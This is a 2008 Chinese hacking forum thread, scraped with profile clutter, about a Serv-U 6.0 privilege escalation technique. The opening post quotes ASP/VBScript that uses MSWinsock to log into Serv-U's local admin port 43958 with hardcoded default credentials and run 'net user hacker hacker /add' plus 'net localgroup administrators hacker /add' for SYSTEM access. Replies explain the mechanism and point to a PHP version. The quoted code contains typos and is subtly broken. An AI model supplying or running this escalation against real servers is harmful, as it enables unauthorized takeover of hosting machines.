jjcd

Rank: 4

帖子: 176
积分: 477
威望: 758
金钱: 638
在线时间: 0 小时

贡献奖灌水王帅哥勋章

1楼 跳转到 » 倒序看帖

打印

字体大小: tT

发表于 2008-7-23 08:35 | 只看该作者

[讨论]Serv-u6.0提权新招（结帖）

权新招, 讨论

[讨论]Serv-u6.0提权新招（结帖）
议题提交：宿心劫

第一次见到这段码时认为是不可能的因为控件的问题
现在听KEVIN的分析就够了
我提出的第二个问题是因为我没绕过一个弯
引用:
来源：黑客防线
适用环境：服务器禁用FSO，关掉Wscript.shelll,没有执行权限。
限制：没有更改管理员的密码，或者破解出了Serv-U的管理员的密码。Serv-U默认用户名：localadministrator? 密码：#|@$ak#.|k;0@p???下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户，代码如下：
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)

Sock.senddata.sendata

使用这个代码就可以连上FTP了，接下来用Sock.senddata sendata 发送添加有执行权限用户的命令，想必大家该知道怎么做了吧，对了，就是用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add”
呵呵，就这样系统权限到手了，祝大家好运！
我有两个问题
一、MSWINSCK.OCX控件为VB 网络支持库  系统是不自带的
参考文章《关于VBS调用MSWinsock控件》
http://www.eviloctal.com/forum/read.php?tid=8748&fpage=1

二、文中提到"下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户"
我想问一下  这段本地提权的码真的有system权限吗风停了又吹我忽然想起谁天亮了又黑我过了好几岁心暖了又灰世界有时候孤单的很需要另一个同类

帖子108 精华4 积分3417 阅读权限100 性别男来自浙江在线时间3 小时注册时间2004-12-19 最后登录2008-4-20 查看详细资料TOP 赚更多的钱

kevin1986

荣誉会员

揸拖拉机入西藏

3.A.S.T士兵

Rank: 1

帖子: 30
积分: 45
威望: 60
金钱: 54
在线时间: 0 小时

2楼

发表于 2008-7-23 08:35 | 只看该作者

恩....这样的主机的确是很少,不过我曾经遇见过有安装过VB的主机,这样的主机是可行的.因为MSWINSCK.OCX在VB中带的,所以可以用来创建连接.
而文章中说说的是向Serv-U的43958端口发包,也就是Su.exe这类提全工具的原理..明白否?me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华12 积分3936 阅读权限100 性别男在线时间308 小时注册时间2005-2-5 最后登录2007-9-3 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

宿心劫

荣誉会员

TOP

Nicky

3.A.S.T士兵

Rank: 1

帖子: 8
积分: 12
威望: 16
金钱: 16
在线时间: 0 小时

3楼

发表于 2008-7-23 08:35 | 只看该作者

提权的原理我一直都清楚
只是对那个控件表示怀疑
但Su.exe提权需要能够被执行（权限要求是有的）
而且文中提到是以system权限添加超级用户
我就不懂了
ASP执行时有那么大的权限？风停了又吹我忽然想起谁天亮了又黑我过了好几岁心暖了又灰世界有时候孤单的很需要另一个同类

帖子108 精华4 积分3417 阅读权限100 性别男来自浙江在线时间3 小时注册时间2004-12-19 最后登录2008-4-20 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

我非我

荣誉会员

TOP

aaronliu

3.A.S.T士兵

Rank: 1

帖子: 12
积分: 18
威望: 23
金钱: 21
在线时间: 0 小时

4楼

发表于 2008-7-23 08:35 | 只看该作者

原理是和kevin说的一样。不过上面的ftp添加用户的语句没有给全。你可以到su.exe的原码里找。但如果是直接用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add” 这样发到43958是没用的。因为localadmin是没法执行。
你添加了ftp有执行权限的用户后再利用这个ftp用户添加系统用户。此时会有权限。因为它此时继承的是servu的权限。不是iisuser的了。
你看我的servuexp的php版的代码应该可以看懂。思路一样的。只不过这个代码是asp的，而且不太通用罢了。http://www.phpweblog.net/GaRY/

帖子150 精华6 积分5639 阅读权限100 性别男在线时间189 小时注册时间2005-2-4 最后登录2008-1-31 查看详细资料TOP

kevin1986

荣誉会员

TOP

贝贝猫

3.A.S.T士兵

Rank: 1

帖子: 7
积分: 11
威望: 14
金钱: 12
在线时间: 0 小时

5楼

发表于 2008-7-23 08:35 | 只看该作者

不是呢...
那个控件是没问题了.
只是,用ASP调用这个控件对43958端口发送一串添加具有可执行的FTP帐户的包,然后再通过Serv-U来执行命令达到提升权限的目的.
这个相当于小我的SERV-U提权PHP程序的ASP版本吧.我曾经成功过的me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华12 积分3936 阅读权限100 性别男在线时间308 小时注册时间2005-2-5 最后登录2007-9-3 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

撕碎了的小C

技术核心组

TOP

pat1110

3.A.S.T士兵

Rank: 1

帖子: 14
积分: 20
威望: 26
金钱: 26
在线时间: 0 小时

6楼

发表于 2008-7-23 08:35 | 只看该作者

如果可以向管理端口发送数据的话，得到的权限理论上应该跟SERV-U一样，如果SERV-U是以服务启动的话就可以得到SYSTEM权限。我是金子，我要闪光的....!
帖子128 精华4 积分3748 阅读权限200 性别男来自湖南在线时间124 小时注册时间2005-1-28 最后登录2008-7-8 查看详细资料TOP 少女暴富的隐秘（图）

serenade

晶莹剔透§烈日灼然

TOP

Ange细